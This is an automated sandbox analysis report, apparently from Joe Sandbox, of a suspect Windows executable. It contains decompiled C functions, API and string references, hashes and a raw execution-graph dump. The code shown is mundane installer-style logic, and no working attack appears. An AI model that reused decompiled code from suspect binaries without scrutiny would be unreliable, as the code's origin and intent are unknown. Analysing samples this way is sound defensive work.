                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                  • CreateFontIndirectA.GDI32(0040B054), ref: 00401D8A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirect
                                                  • String ID:
                                                  • API String ID: 3272661963-0
                                                  • Opcode ID: 8e548603e350ce1a89f038fa1766b34cdc841b1a5af396ce190c880d9480c0eb
                                                  • Instruction ID: c086b606221abe62c4a5ea5e4ce8852375084165fd0064a8092653b5abcc508f
                                                  • Opcode Fuzzy Hash: 8e548603e350ce1a89f038fa1766b34cdc841b1a5af396ce190c880d9480c0eb
                                                  • Instruction Fuzzy Hash: FAF04471A48240AEE70167709E0AB9B3F64D715305F104476B251B62F2C7790444CBAE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00403A17(void* __ecx, void* __eflags) {
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed short _t6;
                                                  				intOrPtr _t11;
                                                  				signed int _t13;
                                                  				signed int _t16;
                                                  				signed short* _t18;
                                                  				signed int _t20;
                                                  				signed short* _t23;
                                                  				intOrPtr _t25;
                                                  				signed int _t26;
                                                  				intOrPtr* _t27;
                                                  
                                                  				_t24 = "1033";
                                                  				_t13 = 0xffff;
                                                  				_t6 = E00405C72(__ecx, "1033");
                                                  				while(1) {
                                                  					_t26 =  *0x423fc4;
                                                  					if(_t26 == 0) {
                                                  						goto L7;
                                                  					}
                                                  					_t16 =  *( *0x423f90 + 0x64);
                                                  					_t20 =  ~_t16;
                                                  					_t18 = _t16 * _t26 +  *0x423fc0;
                                                  					while(1) {
                                                  						_t18 = _t18 + _t20;
                                                  						_t26 = _t26 - 1;
                                                  						if((( *_t18 ^ _t6) & _t13) == 0) {
                                                  							break;
                                                  						}
                                                  						if(_t26 != 0) {
                                                  							continue;
                                                  						}
                                                  						goto L7;
                                                  					}
                                                  					 *0x423760 = _t18[1];
                                                  					 *0x424028 = _t18[3];
                                                  					_t23 =  &(_t18[5]);
                                                  					if(_t23 != 0) {
                                                  						 *0x42375c = _t23;
                                                  						E00405C59(_t24,  *_t18 & 0x0000ffff);
                                                  						SetWindowTextA( *0x420558, E00405D1D(_t13, _t24, _t26, 0x423780, 0xfffffffe));
                                                  						_t11 =  *0x423fac;
                                                  						_t27 =  *0x423fa8;
                                                  						if(_t11 == 0) {
                                                  							L15:
                                                  							return _t11;
                                                  						}
                                                  						_t25 = _t11;
                                                  						do {
                                                  							_t11 =  *_t27;
                                                  							if(_t11 != 0) {
                                                  								_t11 = E00405D1D(_t13, _t25, _t27, _t27 + 0x18, _t11);
                                                  							}
                                                  							_t27 = _t27 + 0x418;
                                                  							_t25 = _t25 - 1;
                                                  						} while (_t25 != 0);
                                                  						goto L15;
                                                  					}
                                                  					L7:
                                                  					if(_t13 != 0xffff) {
                                                  						_t13 = 0;
                                                  					} else {
                                                  						_t13 = 0x3ff;
                                                  					}
                                                  				}
                                                  			}

















                                                  APIs
                                                  • SetWindowTextA.USER32(00000000,00423780), ref: 00403AAF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: TextWindow
                                                  • String ID: "C:\Users\user\Desktop\Lc8xQv8iZY.exe"$1033
                                                  • API String ID: 530164218-2318113328
                                                  • Opcode ID: bde8280c9c770d58924a074a3110f1818d19584ed3810c5b524036327c9d2aac
                                                  • Instruction ID: d2f26ffd722b9fc2ec01e0f6875488dfbe0f51797c7981412bd9696a178e6430
                                                  • Opcode Fuzzy Hash: bde8280c9c770d58924a074a3110f1818d19584ed3810c5b524036327c9d2aac
                                                  • Instruction Fuzzy Hash: D511D071B00201ABC720EF149C80A373BA8EB85716369813BE841A73A0D73D9A028E58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00404F37(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                  				long _t22;
                                                  
                                                  				if(_a8 != 0x102) {
                                                  					if(_a8 != 0x200) {
                                                  						_t22 = _a16;
                                                  						L7:
                                                  						if(_a8 == 0x419 &&  *0x420568 != _t22) {
                                                  							 *0x420568 = _t22;
                                                  							E00405CFB(0x420580, 0x425000);
                                                  							E00405C59(0x425000, _t22);
                                                  							E0040140B(6);
                                                  							E00405CFB(0x425000, 0x420580);
                                                  						}
                                                  						L11:
                                                  						return CallWindowProcA( *0x420570, _a4, _a8, _a12, _t22);
                                                  					}
                                                  					if(IsWindowVisible(_a4) == 0) {
                                                  						L10:
                                                  						_t22 = _a16;
                                                  						goto L11;
                                                  					}
                                                  					_t22 = E004048B6(_a4, 1);
                                                  					_a8 = 0x419;
                                                  					goto L7;
                                                  				}
                                                  				if(_a12 != 0x20) {
                                                  					goto L10;
                                                  				}
                                                  				E00404003(0x413);
                                                  				return 0;
                                                  			}





                                                  APIs
                                                  • IsWindowVisible.USER32 ref: 00404F6D
                                                  • CallWindowProcA.USER32 ref: 00404FDB
                                                    • Part of subcall function 00404003: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00404015
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: a9a9cd53ea9b16651c68b641742eb392f20282b9ff56190fccbee61235c86997
                                                  • Instruction ID: e5405207afdf9c80724cdb5948ae190fd13b5b366899adbc3f84073b9e1b6582
                                                  • Opcode Fuzzy Hash: a9a9cd53ea9b16651c68b641742eb392f20282b9ff56190fccbee61235c86997
                                                  • Instruction Fuzzy Hash: 2A116D71604209BBEF21AF52DD4199B3768AB503A5F00813BFA05791E1C7784992DFAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004036B9() {
                                                  				void* _t2;
                                                  				void* _t3;
                                                  				void* _t6;
                                                  				void* _t8;
                                                  
                                                  				_t8 =  *0x41f53c;
                                                  				_t3 = E0040369E(_t2, 0);
                                                  				if(_t8 != 0) {
                                                  					do {
                                                  						_t6 = _t8;
                                                  						_t8 =  *_t8;
                                                  						FreeLibrary( *(_t6 + 8));
                                                  						_t3 = GlobalFree(_t6);
                                                  					} while (_t8 != 0);
                                                  				}
                                                  				 *0x41f53c =  *0x41f53c & 0x00000000;
                                                  				return _t3;
                                                  			}








                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,7476F560,00403690,00000000,00403482,00000000), ref: 004036D3
                                                  • GlobalFree.KERNEL32 ref: 004036DA
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004036CB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1100898210-3081826266
                                                  • Opcode ID: e38f7b7ef76e64d847b72dc92418a1a22abc338dac8168bb5d5fc62d2911f828
                                                  • Instruction ID: 7520a5cbb74b84659c3a5403b35965a418cfcd2fa6a259890695166e8a2f0d53
                                                  • Opcode Fuzzy Hash: e38f7b7ef76e64d847b72dc92418a1a22abc338dac8168bb5d5fc62d2911f828
                                                  • Instruction Fuzzy Hash: 53E08C3281142067C6315F0ABD0875A76AC6B45B26F018436E900B73A187756C438FDC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405835(char* _a4) {
                                                  				char* _t3;
                                                  				char* _t5;
                                                  
                                                  				_t5 = _a4;
                                                  				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                  				while( *_t3 != 0x5c) {
                                                  					_t3 = CharPrevA(_t5, _t3);
                                                  					if(_t3 > _t5) {
                                                  						continue;
                                                  					}
                                                  					break;
                                                  				}
                                                  				 *_t3 =  *_t3 & 0x00000000;
                                                  				return  &(_t3[1]);
                                                  			}






                                                  APIs
                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CF4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Lc8xQv8iZY.exe,C:\Users\user\Desktop\Lc8xQv8iZY.exe,80000000,00000003), ref: 0040583B
                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CF4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Lc8xQv8iZY.exe,C:\Users\user\Desktop\Lc8xQv8iZY.exe,80000000,00000003), ref: 00405849
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-224404859
                                                  • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                  • Instruction ID: d70a425eade4063b78d7fa64a6a9160d8ae63170ea867be96e5b455a3914fe1f
                                                  • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                  • Instruction Fuzzy Hash: 01D05E634189A02EE30376509C04B8B6A48CF12340F198462E940A2190C2784C418BAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405947(CHAR* _a4, CHAR* _a8) {
                                                  				int _t10;
                                                  				int _t15;
                                                  				CHAR* _t16;
                                                  
                                                  				_t15 = lstrlenA(_a8);
                                                  				_t16 = _a4;
                                                  				while(lstrlenA(_t16) >= _t15) {
                                                  					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                                  					_t10 = lstrcmpiA(_t16, _a8);
                                                  					if(_t10 == 0) {
                                                  						return _t16;
                                                  					}
                                                  					_t16 = CharNextA(_t16);
                                                  				}
                                                  				return 0;
                                                  			}







                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040594E
                                                  • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405967
                                                  • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405975
                                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040597E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: b9005c049e247e33e5549b3e141599c62d2a38fed0f6fd2d3c1464f89547bebd
                                                  • Instruction ID: 50b9e356db97d407f8629b59342efd8dd4fdec4619503af860e0f04522e7a9f7
                                                  • Opcode Fuzzy Hash: b9005c049e247e33e5549b3e141599c62d2a38fed0f6fd2d3c1464f89547bebd
                                                  • Instruction Fuzzy Hash: C1F0A776209D51EFC2026B255C04D7BBF94EF91324B24057BF440F2180D3399815DBBB
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:5.4%
                                                  Dynamic/Decrypted Code Coverage:7.1%
                                                  Signature Coverage:2.8%
                                                  Total number of Nodes:1172
                                                  Total number of Limit Nodes:15
405d50 10409->10414 10410->10412 10412->10388 10415 405d5f 10414->10415 10418 405d6d 10414->10418 10416 404b80 4 API calls 10415->10416 10416->10418 10417 405dea 10419 405dfe RegSetValueExW 10417->10419 10422 405e20 10417->10422 10418->10417 10420 405da8 wsprintfW RegSetValueExW 10418->10420 10419->10422 10420->10418 10421 405e34 RegSetValueExW 10423 405e56 10421->10423 10422->10421 10422->10423 10424 405e6a RegSetValueExW 10423->10424 10425 405e8f 10423->10425 10424->10425 10426 405e95 lstrcmpW 10425->10426 10427 405ead lstrlenW RegSetValueExW 10425->10427 10426->10427 10428 405edf 10426->10428 10427->10428 10429 405ef3 RegSetValueExW 10428->10429 10430 405f18 10428->10430 10429->10430 10431 405f3a GetDpiForSystem MulDiv GetDpiForSystem MulDiv RegSetValueExW 10430->10431 10432 405fa5 10430->10432 10431->10432 10433 405fb9 RegSetValueExW 10432->10433 10434 405fde 10432->10434 10433->10434 10435 405ff2 RegSetValueExW 10434->10435 10436 406014 10434->10436 10435->10436 10437 406025 RegSetValueExW 10436->10437 10438 406047 10436->10438 10437->10438 10439 406058 RegSetValueExW 10438->10439 10440 40607a 10438->10440 10439->10440 10441 40608b RegSetValueExW 10440->10441 10442 4060ad 10440->10442 10441->10442 10443 4060c1 RegSetValueExW 10442->10443 10444 4060e3 10442->10444 10443->10444 10445 4060f4 RegSetValueExW 10444->10445 10446 406116 10444->10446 10445->10446 10447 406132 RegSetValueExW 10446->10447 10448 406171 10446->10448 10447->10448 10449 406185 RegSetValueExW 10448->10449 10450 4061a7 10448->10450 10449->10450 10451 4061c3 RegSetValueExW 10450->10451 10452 405d23 RegCloseKey 10450->10452 10451->10452 10452->10408 10454 4075cf 10453->10454 10498 406360 10454->10498 10458 407b85 10457->10458 10459 407bc7 10457->10459 10458->10459 10461 407d28 10458->10461 10462 407baf IsWindowVisible 10458->10462 10460 407d0f 10459->10460 10465 407c24 GetDC 10459->10465 10528 4034b0 SetRect 10460->10528 10464 407d8b GetWindowLongW AdjustWindowRect 10461->10464 10469 407fd4 
10461->10469 10462->10459 10462->10461 10466 407e18 GetSystemMetrics SetScrollRange SetScrollPos ShowScrollBar 10464->10466 10467 407e7a ShowScrollBar 10464->10467 10468 407c42 CreateCompatibleBitmap ReleaseDC SelectObject 10465->10468 10493 4020b1 10465->10493 10470 407e8e 10466->10470 10467->10470 10471 407cb8 DeleteObject 10468->10471 10472 407ccb SetRect 10468->10472 10475 408008 ScrollWindow SetScrollPos SetScrollPos InvalidateRect 10469->10475 10478 4080ba 10469->10478 10473 407e9c GetSystemMetrics SetScrollRange SetScrollPos ShowScrollBar 10470->10473 10474 407efe ShowScrollBar 10470->10474 10471->10472 10515 4038d0 10472->10515 10477 407f12 SetWindowPos SystemParametersInfoW GetSystemMetrics InvalidateRect UpdateWindow 10473->10477 10474->10477 10475->10478 10477->10478 10479 40820c 10478->10479 10480 4038d0 19 API calls 10478->10480 10481 408247 10479->10481 10530 406e10 10479->10530 10483 4081cd 10480->10483 10484 40825e GetFocus 10481->10484 10490 4082d5 10481->10490 10529 4034b0 SetRect 10483->10529 10486 408284 10484->10486 10484->10490 10488 408293 CreateCaret 10486->10488 10489 4082d7 DestroyCaret 10486->10489 10487 4081e6 InvalidateRect UpdateWindow 10487->10479 10539 4083f0 10488->10539 10489->10490 10492 4083f0 3 API calls 10490->10492 10490->10493 10492->10493 10494 405060 10493->10494 10496 40506f 10494->10496 10495 4020bd 10495->10086 10496->10495 10544 40a190 10496->10544 10499 40646a GetDC 10498->10499 10506 40638b _memcmp 10498->10506 10500 40648a CreateFontIndirectW 10499->10500 10501 406460 10499->10501 10502 4064b8 SelectObject GetTextMetricsW 10500->10502 10503 40649d ReleaseDC 10500->10503 10501->10394 10504 4064ea GetTextFaceW SelectObject ReleaseDC 10502->10504 10503->10501 10505 40dbeb 14 API calls 10504->10505 10507 40655a 10505->10507 10506->10499 10506->10501 10508 40dc06 15 API calls 10507->10508 10509 40656b ___scrt_uninitialize_crt 10508->10509 10510 406590 GetCPInfo 10509->10510 10511 4065ab 10510->10511 10512 4065ca 
DeleteObject 10511->10512 10513 4065dd 10511->10513 10512->10513 10513->10501 10514 40660a DeleteObject 10513->10514 10514->10501 10516 4038e5 10515->10516 10519 4038f4 10515->10519 10517 40dc06 15 API calls 10516->10517 10516->10519 10518 40390e 10517->10518 10518->10519 10520 40dc06 15 API calls 10518->10520 10519->10460 10521 403937 SelectObject 10520->10521 10526 40396a 10521->10526 10522 4039f5 SelectObject 10523 40dbeb 14 API calls 10522->10523 10525 403a14 10523->10525 10524 40399c SetBkColor SetTextColor 10524->10526 10527 40dbeb 14 API calls 10525->10527 10526->10522 10526->10524 10527->10519 10528->10461 10529->10487 10531 406e46 10530->10531 10532 406e2f GetFocus 10530->10532 10534 406e55 DeleteObject 10531->10534 10537 406e68 10531->10537 10532->10531 10533 406e40 DestroyCaret 10532->10533 10533->10531 10534->10537 10535 406ed4 10535->10481 10536 406fc1 CreateBitmap 10538 40dbeb 14 API calls 10536->10538 10537->10535 10537->10536 10538->10535 10540 408410 10539->10540 10541 4083ff GetFocus 10539->10541 10540->10490 10541->10540 10542 408412 10541->10542 10543 408441 SetCaretPos ShowCaret 10542->10543 10543->10540 10545 40a1a3 10544->10545 10549 40a19c 10544->10549 10546 40a1d0 ___scrt_uninitialize_crt 10545->10546 10550 40dc11 10545->10550 10546->10549 10563 405270 10546->10563 10549->10495 10551 40f727 10550->10551 10552 40f734 10551->10552 10553 40f73f 10551->10553 10554 40f5fb __onexit 15 API calls 10552->10554 10555 40f747 10553->10555 10561 40f750 pre_c_initialization 10553->10561 10559 40f73c 10554->10559 10556 40f5c1 ___vcrt_freefls@4 14 API calls 10555->10556 10556->10559 10557 40f755 10560 40f9f9 __dosmaperr 14 API calls 10557->10560 10558 40f77a HeapReAlloc 10558->10559 10558->10561 10559->10546 10560->10559 10561->10557 10561->10558 10562 4127fd pre_c_initialization 2 API calls 10561->10562 10562->10561 10579 4052b1 10563->10579 10564 4054c8 10565 40556a 10564->10565 10587 407750 10564->10587 10567 4055c0 10565->10567 10568 4055a0 
10565->10568 10570 4055af 10565->10570 10578 405575 ___scrt_fastfail 10565->10578 10569 4055e2 10567->10569 10608 401b20 10567->10608 10571 402fa0 16 API calls 10568->10571 10614 402e30 10569->10614 10575 40dbeb 14 API calls 10570->10575 10571->10570 10576 4056af 10575->10576 10577 40dbeb 14 API calls 10576->10577 10577->10578 10578->10549 10579->10564 10580 402fa0 10579->10580 10581 402fb5 ___scrt_uninitialize_crt 10580->10581 10582 402fba 10580->10582 10581->10579 10583 403041 10582->10583 10584 402fc3 10582->10584 10583->10581 10586 402e30 16 API calls 10583->10586 10585 402e30 16 API calls 10584->10585 10585->10581 10586->10581 10618 4034b0 SetRect 10587->10618 10589 40777c 10591 40790e 10589->10591 10619 404660 10589->10619 10595 40797e 10591->10595 10627 404fe0 10591->10627 10593 407a31 10594 407a5c 10593->10594 10597 406d30 4 API calls 10593->10597 10653 407430 10594->10653 10595->10593 10596 407a24 10595->10596 10633 406d30 10595->10633 10641 4075f0 10596->10641 10597->10594 10602 40781d 10602->10591 10623 40a060 10602->10623 10605 407799 10605->10602 10607 40a060 8 API calls 10605->10607 10607->10605 10609 401b32 10608->10609 10611 401b37 _memcmp 10608->10611 10609->10569 10610 40dc06 15 API calls 10612 401bb7 ___scrt_uninitialize_crt 10610->10612 10611->10609 10611->10610 10612->10609 10613 40dbeb 14 API calls 10612->10613 10613->10609 10615 402e50 10614->10615 10616 402e57 10614->10616 10615->10570 10617 40dc11 16 API calls 10616->10617 10617->10615 10618->10589 10620 40467f 10619->10620 10621 40466f 10619->10621 10620->10605 10622 4074c0 4 API calls 10621->10622 10622->10620 10624 40a074 10623->10624 10625 404fe0 8 API calls 10624->10625 10626 40a0a9 10624->10626 10625->10626 10626->10602 10628 404ff2 10627->10628 10629 405037 SetRect 10628->10629 10630 405028 10628->10630 10632 405035 10629->10632 10631 4075f0 7 API calls 10630->10631 10631->10632 10632->10595 10634 406d44 10633->10634 10635 406da8 10633->10635 10639 4074c0 4 API calls 10634->10639 
10637 4074c0 4 API calls 10635->10637 10640 406d9a 10635->10640 10637->10635 10639->10640 10669 406b50 10640->10669 10642 4075ff 10641->10642 10643 40761e 10642->10643 10644 407631 10642->10644 10645 407645 10642->10645 10643->10593 10678 408480 10644->10678 10645->10643 10647 404660 4 API calls 10645->10647 10651 407663 10647->10651 10648 407738 10682 4034b0 SetRect 10648->10682 10650 406b50 4 API calls 10650->10651 10651->10648 10651->10650 10652 4074c0 WriteFile GetLastError WriteFile GetLastError 10651->10652 10652->10651 10654 407441 10653->10654 10655 40743f 10653->10655 10656 407498 10654->10656 10657 40744d 10654->10657 10664 408370 10655->10664 10658 404660 4 API calls 10656->10658 10662 407489 10656->10662 10660 406b50 4 API calls 10657->10660 10658->10662 10659 407060 2 API calls 10659->10655 10661 40746d 10660->10661 10661->10662 10663 4074c0 4 API calls 10661->10663 10662->10659 10663->10662 10665 408387 10664->10665 10666 407a74 10664->10666 10665->10666 10667 4083c8 PostMessageW 10665->10667 10668 4083ae SetTimer 10665->10668 10666->10565 10667->10666 10668->10666 10671 406b64 10669->10671 10670 406b72 10670->10596 10671->10670 10672 406cb3 10671->10672 10673 406bdc 10671->10673 10675 406b8e 10671->10675 10674 404660 4 API calls 10672->10674 10672->10675 10673->10675 10677 4074c0 4 API calls 10673->10677 10674->10675 10675->10670 10676 4074c0 4 API calls 10675->10676 10676->10670 10677->10675 10679 4084a1 10678->10679 10680 408370 2 API calls 10679->10680 10681 408547 10680->10681 10681->10643 10682->10643 10684 401adf 10683->10684 10686 401aef 10683->10686 10685 40dc11 16 API calls 10684->10685 10685->10686 10686->10122 10688 4056f4 10687->10688 10689 404e1f LeaveCriticalSection 10688->10689 10690 401ad0 16 API calls 10688->10690 10689->10122 10689->10128 10690->10688 10692 40f501 10691->10692 10693 40f513 ___scrt_uninitialize_crt 10691->10693 10694 40f50f 10692->10694 10696 412e16 10692->10696 10693->9890 10694->9890 10699 412cc4 10696->10699 10702 
412c18 10699->10702 10703 412c24 ___scrt_is_nonwritable_in_current_image 10702->10703 10710 4113bc EnterCriticalSection 10703->10710 10705 412c2e ___scrt_uninitialize_crt 10706 412c9a 10705->10706 10711 412b8c 10705->10711 10719 412cb8 10706->10719 10710->10705 10712 412b98 ___scrt_is_nonwritable_in_current_image 10711->10712 10722 412f33 EnterCriticalSection 10712->10722 10714 412ba2 ___scrt_uninitialize_crt 10715 412bee 10714->10715 10723 412dce 10714->10723 10733 412c0c 10715->10733 10866 411404 LeaveCriticalSection 10719->10866 10721 412ca6 10721->10694 10722->10714 10724 412de4 10723->10724 10725 412ddb 10723->10725 10736 412d69 10724->10736 10727 412cc4 ___scrt_uninitialize_crt 66 API calls 10725->10727 10728 412de1 10727->10728 10728->10715 10731 412e00 10749 413f6f 10731->10749 10865 412f47 LeaveCriticalSection 10733->10865 10735 412bfa 10735->10705 10737 412d81 10736->10737 10738 412da6 10736->10738 10737->10738 10739 4134fd ___scrt_uninitialize_crt 25 API calls 10737->10739 10738->10728 10742 4134fd 10738->10742 10740 412d9f 10739->10740 10760 414767 10740->10760 10743 413509 10742->10743 10744 41351e 10742->10744 10745 40f9f9 __dosmaperr 14 API calls 10743->10745 10744->10731 10746 41350e 10745->10746 10747 40f93c pre_c_initialization 25 API calls 10746->10747 10748 413519 10747->10748 10748->10731 10750 413f80 10749->10750 10751 413f8d 10749->10751 10752 40f9f9 __dosmaperr 14 API calls 10750->10752 10753 413fd6 10751->10753 10756 413fb4 10751->10756 10759 413f85 10752->10759 10754 40f9f9 __dosmaperr 14 API calls 10753->10754 10755 413fdb 10754->10755 10757 40f93c pre_c_initialization 25 API calls 10755->10757 10834 413ecd 10756->10834 10757->10759 10759->10728 10761 414773 ___scrt_is_nonwritable_in_current_image 10760->10761 10762 414793 10761->10762 10763 41477b 10761->10763 10765 41482e 10762->10765 10769 4147c5 10762->10769 10785 40f9e6 10763->10785 10767 40f9e6 __dosmaperr 14 API calls 10765->10767 10770 414833 10767->10770 10768 40f9f9 __dosmaperr 
14 API calls 10771 414788 10768->10771 10788 41159a EnterCriticalSection 10769->10788 10773 40f9f9 __dosmaperr 14 API calls 10770->10773 10771->10738 10775 41483b 10773->10775 10774 4147cb 10776 4147e7 10774->10776 10777 4147fc 10774->10777 10778 40f93c pre_c_initialization 25 API calls 10775->10778 10780 40f9f9 __dosmaperr 14 API calls 10776->10780 10789 414859 10777->10789 10778->10771 10782 4147ec 10780->10782 10781 4147f7 10831 414826 10781->10831 10783 40f9e6 __dosmaperr 14 API calls 10782->10783 10783->10781 10786 40fea1 __dosmaperr 14 API calls 10785->10786 10787 40f9eb 10786->10787 10787->10768 10788->10774 10790 41487b 10789->10790 10826 414897 10789->10826 10791 41487f 10790->10791 10794 4148cf 10790->10794 10792 40f9e6 __dosmaperr 14 API calls 10791->10792 10793 414884 10792->10793 10795 40f9f9 __dosmaperr 14 API calls 10793->10795 10796 4148e5 10794->10796 10797 414f55 ___scrt_uninitialize_crt 27 API calls 10794->10797 10799 41488c 10795->10799 10798 414400 ___scrt_uninitialize_crt 38 API calls 10796->10798 10797->10796 10800 4148ee 10798->10800 10801 40f93c pre_c_initialization 25 API calls 10799->10801 10802 4148f3 10800->10802 10803 41492c 10800->10803 10801->10826 10804 4148f7 10802->10804 10805 414919 10802->10805 10806 414940 10803->10806 10807 414986 WriteFile 10803->10807 10810 4149f3 10804->10810 10815 414398 ___scrt_uninitialize_crt 6 API calls 10804->10815 10811 413fec ___scrt_uninitialize_crt 43 API calls 10805->10811 10808 414976 10806->10808 10809 414948 10806->10809 10812 4149a9 GetLastError 10807->10812 10817 41490f 10807->10817 10816 414471 ___scrt_uninitialize_crt 7 API calls 10808->10816 10813 414966 10809->10813 10814 41494d 10809->10814 10819 40f9f9 __dosmaperr 14 API calls 10810->10819 10810->10826 10811->10817 10812->10817 10818 414635 ___scrt_uninitialize_crt 8 API calls 10813->10818 10814->10810 10821 41454c ___scrt_uninitialize_crt 7 API calls 10814->10821 10815->10817 10816->10817 10817->10810 10820 4149c9 10817->10820 
10817->10826 10818->10817 10822 414a14 10819->10822 10823 4149d0 10820->10823 10824 4149e7 10820->10824 10821->10817 10825 40f9e6 __dosmaperr 14 API calls 10822->10825 10827 40f9f9 __dosmaperr 14 API calls 10823->10827 10828 40f9c3 __dosmaperr 14 API calls 10824->10828 10825->10826 10826->10781 10829 4149d5 10827->10829 10828->10826 10830 40f9e6 __dosmaperr 14 API calls 10829->10830 10830->10826 10832 4115bd ___scrt_uninitialize_crt LeaveCriticalSection 10831->10832 10833 41482c 10832->10833 10833->10771 10835 413ed9 ___scrt_is_nonwritable_in_current_image 10834->10835 10848 41159a EnterCriticalSection 10835->10848 10837 413ee8 10838 413f2f 10837->10838 10849 411671 10837->10849 10839 40f9f9 __dosmaperr 14 API calls 10838->10839 10841 413f34 10839->10841 10862 413f63 10841->10862 10842 413f14 FlushFileBuffers 10842->10841 10843 413f20 10842->10843 10844 40f9e6 __dosmaperr 14 API calls 10843->10844 10846 413f25 GetLastError 10844->10846 10846->10838 10848->10837 10850 411693 10849->10850 10851 41167e 10849->10851 10853 40f9e6 __dosmaperr 14 API calls 10850->10853 10857 4116b8 10850->10857 10852 40f9e6 __dosmaperr 14 API calls 10851->10852 10854 411683 10852->10854 10855 4116c3 10853->10855 10856 40f9f9 __dosmaperr 14 API calls 10854->10856 10858 40f9f9 __dosmaperr 14 API calls 10855->10858 10859 41168b 